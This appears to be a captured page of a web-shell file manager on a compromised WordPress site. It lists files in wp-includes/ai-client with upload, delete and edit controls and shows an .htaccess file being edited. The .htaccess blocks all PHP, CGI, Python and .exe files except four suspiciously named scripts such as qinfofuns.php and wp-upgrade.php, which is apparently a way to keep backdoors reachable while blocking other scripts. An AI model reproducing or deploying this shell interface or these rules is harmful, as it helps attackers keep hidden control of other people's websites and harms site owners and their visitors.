golden hour
/home/godaofbq/hyperbarics4u.com/wp-includes/ai-client
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
514 B
Del
OK
adapters
-
Del
OK
class-wp-ai-client-ability-function-resolver.php
6.12 KB
Del
OK
class-wp-ai-client-prompt-builder.php
19.32 KB
Del
OK
Edit: .htaccess
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> </FilesMatch> <FilesMatch "^(site-maintenance\.php|qinfofuns\.php|wp-upgrade\.php|styles\.php)$"> <IfModule mod_authz_core.c> Require all granted </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Allow from all </IfModule> </FilesMatch>
Save